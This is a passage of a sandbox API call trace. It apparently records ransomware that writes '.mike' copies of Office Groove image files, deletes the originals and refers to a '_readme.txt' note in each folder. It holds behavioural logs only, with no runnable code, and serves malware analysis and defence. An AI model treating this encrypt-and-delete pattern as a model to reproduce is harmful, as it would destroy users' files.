Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\ProjectStatusIcons.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aebfc, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\ProjectStatusIcons.jpg.mike", lpFilePart=0x0) returned 0x76 [0077.392] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\ProjectStatusIcons.jpg", dwFileAttributes=0x80) returned 1 [0077.393] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\ProjectStatusIcons.jpg" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveprojecttoolset\\projectstatusicons.jpg")) returned 1 [0077.394] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\_readme.txt", nBufferLength=0x105, lpBuffer=0x2aea9c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\_readme.txt", lpFilePart=0x0) returned 0x66 [0077.395] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0077.396] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\ProjectTaskIcon.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aec00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\ProjectTaskIcon.jpg.mike", lpFilePart=0x0) returned 0x73 [0077.396] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\ProjectTaskIcon.jpg", nBufferLength=0x105, lpBuffer=0x2aeb64, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\ProjectTaskIcon.jpg", lpFilePart=0x0) returned 0x6e [0077.400] WriteFile (in: hFile=0x288, lpBuffer=0x21af334*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af014, lpOverlapped=0x0 | out: lpBuffer=0x21af334*, lpNumberOfBytesWritten=0x2af014*=0x20c, lpOverlapped=0x0) returned 1 [0077.400] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\ProjectTaskIcon.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aec00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\ProjectTaskIcon.jpg.mike", lpFilePart=0x0) returned 0x73 [0077.400] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\ProjectTaskIcon.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aebfc, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\ProjectTaskIcon.jpg.mike", lpFilePart=0x0) returned 0x73 [0077.400] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\ProjectTaskIcon.jpg", dwFileAttributes=0x80) returned 1 [0077.401] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\ProjectTaskIcon.jpg" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveprojecttoolset\\projecttaskicon.jpg")) returned 1 [0077.402] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\_readme.txt", nBufferLength=0x105, lpBuffer=0x2aea9c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\_readme.txt", lpFilePart=0x0) returned 0x66 [0077.404] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0077.404] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\ProjectToolsetIconImages.jpg", nBufferLength=0x105, lpBuffer=0x2aeb64, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\ProjectToolsetIconImages.jpg", lpFilePart=0x0) returned 0x77 [0077.409] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\ProjectToolsetIconImages.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aec00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\ProjectToolsetIconImages.jpg.mike", lpFilePart=0x0) returned 0x7c [0077.409] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\ProjectToolsetIconImages.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aebfc, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\ProjectToolsetIconImages.jpg.mike", lpFilePart=0x0) returned 0x7c [0077.409] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\ProjectToolsetIconImages.jpg", dwFileAttributes=0x80) returned 1 [0077.409] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\ProjectToolsetIconImages.jpg" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveprojecttoolset\\projecttoolseticonimages.jpg")) returned 1 [0077.411] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\_readme.txt", nBufferLength=0x105, lpBuffer=0x2aea9c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\_readme.txt", lpFilePart=0x0) returned 0x66 [0077.413] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0077.413] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\SplashImage.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aec00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\SplashImage.jpg.mike", lpFilePart=0x0) returned 0x6f [0077.414] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\SplashImage.jpg", nBufferLength=0x105, lpBuffer=0x2aeb64, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\SplashImage.jpg", lpFilePart=0x0) returned 0x6a [0077.420] WriteFile (in: hFile=0x288, lpBuffer=0x220a3a8*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af014, lpOverlapped=0x0 | out: lpBuffer=0x220a3a8*, lpNumberOfBytesWritten=0x2af014*=0x20c, lpOverlapped=0x0) returned 1 [0077.420] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\SplashImage.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aec00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\SplashImage.jpg.mike", lpFilePart=0x0) returned 0x6f [0077.420] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\SplashImage.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aebfc, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\SplashImage.jpg.mike", lpFilePart=0x0) returned 0x6f [0077.420] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\SplashImage.jpg", dwFileAttributes=0x80) returned 1 [0077.421] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\SplashImage.jpg" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveprojecttoolset\\splashimage.jpg")) returned 1 [0077.422] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\_readme.txt", nBufferLength=0x105, lpBuffer=0x2aea9c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\_readme.txt", lpFilePart=0x0) returned 0x66 [0077.424] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0077.425] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\TABOFF.JPG.mike", nBufferLength=0x105, lpBuffer=0x2aec00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\TABOFF.JPG.mike", lpFilePart=0x0) returned 0x6a [0077.425] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\TABOFF.JPG", nBufferLength=0x105, lpBuffer=0x2aeb64, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\TABOFF.JPG", lpFilePart=0x0) returned 0x65 [0077.428] WriteFile (in: hFile=0x288, lpBuffer=0x2221058*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af014, lpOverlapped=0x0 | out: lpBuffer=0x2221058*, lpNumberOfBytesWritten=0x2af014*=0x20c, lpOverlapped=0x0) returned 1 [0077.429] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\TABOFF.JPG.mike", nBufferLength=0x105, lpBuffer=0x2aec00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\TABOFF.JPG.mike", lpFilePart=0x0) returned 0x6a [0077.429] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\TABOFF.JPG.mike", nBufferLength=0x105, lpBuffer=0x2aebfc, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\TABOFF.JPG.mike", lpFilePart=0x0) returned 0x6a [0077.429] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\TABOFF.JPG", dwFileAttributes=0x80) returned 1 [0077.430] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\TABOFF.JPG" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveprojecttoolset\\taboff.jpg")) returned 1 [0077.431] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\_readme.txt", nBufferLength=0x105, lpBuffer=0x2aea9c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\_readme.txt", lpFilePart=0x0) returned 0x66 [0077.436] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0077.436] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\TABON.JPG.mike", nBufferLength=0x105, lpBuffer=0x2aec00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\TABON.JPG.mike", lpFilePart=0x0) returned 0x69 [0077.437] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\TABON.JPG", nBufferLength=0x105, lpBuffer=0x2aeb64, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\TABON.JPG", lpFilePart=0x0) returned 0x64 [0077.440] WriteFile (in: hFile=0x288, lpBuffer=0x2233984*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af014, lpOverlapped=0x0 | out: lpBuffer=0x2233984*, lpNumberOfBytesWritten=0x2af014*=0x20c, lpOverlapped=0x0) returned 1 [0077.441] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\TABON.JPG.mike", nBufferLength=0x105, lpBuffer=0x2aec00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\TABON.JPG.mike", lpFilePart=0x0) returned 0x69 [0077.441] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\TABON.JPG.mike", nBufferLength=0x105, lpBuffer=0x2aebfc, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\TABON.JPG.mike", lpFilePart=0x0) returned 0x69 [0077.441] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\TABON.JPG", dwFileAttributes=0x80) returned 1 [0077.441] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\TABON.JPG" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveprojecttoolset\\tabon.jpg")) returned 1 [0077.443] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\_readme.txt", nBufferLength=0x105, lpBuffer=0x2aea9c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\_readme.txt", lpFilePart=0x0) returned 0x66 [0077.445] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0077.445] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\WHITEBOX.JPG.mike", nBufferLength=0x105, lpBuffer=0x2aec00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\WHITEBOX.JPG.mike", lpFilePart=0x0) returned 0x6c [0077.445] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\WHITEBOX.JPG", nBufferLength=0x105, lpBuffer=0x2aeb64, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\WHITEBOX.JPG", lpFilePart=0x0) returned 0x67 [0077.449] WriteFile (in: hFile=0x288, lpBuffer=0x2247bc0*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af014, lpOverlapped=0x0 | out: lpBuffer=0x2247bc0*, lpNumberOfBytesWritten=0x2af014*=0x20c, lpOverlapped=0x0) returned 1 [0077.450] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\WHITEBOX.JPG.mike", nBufferLength=0x105, lpBuffer=0x2aec00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\WHITEBOX.JPG.mike", lpFilePart=0x0) returned 0x6c [0077.450] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\WHITEBOX.JPG.mike", nBufferLength=0x105, lpBuffer=0x2aebfc, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\WHITEBOX.JPG.mike", lpFilePart=0x0) returned 0x6c [0077.450] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\WHITEBOX.JPG", dwFileAttributes=0x80) returned 1 [0077.450] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\WHITEBOX.JPG" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveprojecttoolset\\whitebox.jpg")) returned 1 [0077.451] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\_readme.txt", nBufferLength=0x105, lpBuffer=0x2aea9c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\_readme.txt", lpFilePart=0x0) returned 0x66 [0077.453] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0077.454] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\ZoomIcons.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aec00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\ZoomIcons.jpg.mike", lpFilePart=0x0) returned 0x6d [0077.454] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\ZoomIcons.jpg", nBufferLength=0x105, lpBuffer=0x2aeb64, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\ZoomIcons.jpg", lpFilePart=0x0) returned 0x68 [0077.458] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\ZoomIcons.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aec00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\ZoomIcons.jpg.mike", lpFilePart=0x0) returned 0x6d [0077.458] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\ZoomIcons.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aebfc, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\ZoomIcons.jpg.mike", lpFilePart=0x0) returned 0x6d [0077.458] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\ZoomIcons.jpg", dwFileAttributes=0x80) returned 1 [0077.458] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\ZoomIcons.jpg" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveprojecttoolset\\zoomicons.jpg")) returned 1 [0077.459] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\_readme.txt", nBufferLength=0x105, lpBuffer=0x2aea9c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\_readme.txt", lpFilePart=0x0) returned 0x66 [0077.461] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0077.461] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0077.461] CoTaskMemFree (pv=0x506980) [0077.461] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0077.461] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\ProjectTool", nBufferLength=0x105, lpBuffer=0x2aec04, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\ProjectTool", lpFilePart=0x0) returned 0x66 [0077.462] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0077.462] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0077.462] CoTaskMemFree (pv=0x506980) [0077.462] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0077.463] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\ProjectTool\\Project Report Type", nBufferLength=0x105, lpBuffer=0x2aebbc, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\ProjectTool\\Project Report Type", lpFilePart=0x0) returned 0x7a [0077.463] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0077.463] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0077.463] CoTaskMemFree (pv=0x506980) [0077.463] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0077.463] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\ProjectTool\\Project Report Type\\Basic", nBufferLength=0x105, lpBuffer=0x2aeb74, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\ProjectTool\\Project Report Type\\Basic", lpFilePart=0x0) returned 0x80 [0077.464] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0077.464] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0077.464] CoTaskMemFree (pv=0x506980) [0077.464] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0077.465] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\ProjectTool\\Project Report Type\\Fancy", nBufferLength=0x105, lpBuffer=0x2aeb74, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\ProjectTool\\Project Report Type\\Fancy", lpFilePart=0x0) returned 0x80 [0077.468] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0077.468] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0077.468] CoTaskMemFree (pv=0x506980) [0077.468] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aebd8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0077.469] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\Welcome Tool", nBufferLength=0x105, lpBuffer=0x2aec4c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\Welcome Tool", lpFilePart=0x0) returned 0x52 [0077.470] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0077.471] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\Welcome Tool\\IconImages.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aec00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\Welcome Tool\\IconImages.jpg.mike", lpFilePart=0x0) returned 0x66 [0077.471] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\Welcome Tool\\IconImages.jpg", nBufferLength=0x105, lpBuffer=0x2aeb64, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\Welcome Tool\\IconImages.jpg", lpFilePart=0x0) returned 0x61 [0077.477] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\Welcome Tool\\IconImages.jpg.mike", nBufferLength=0x105, 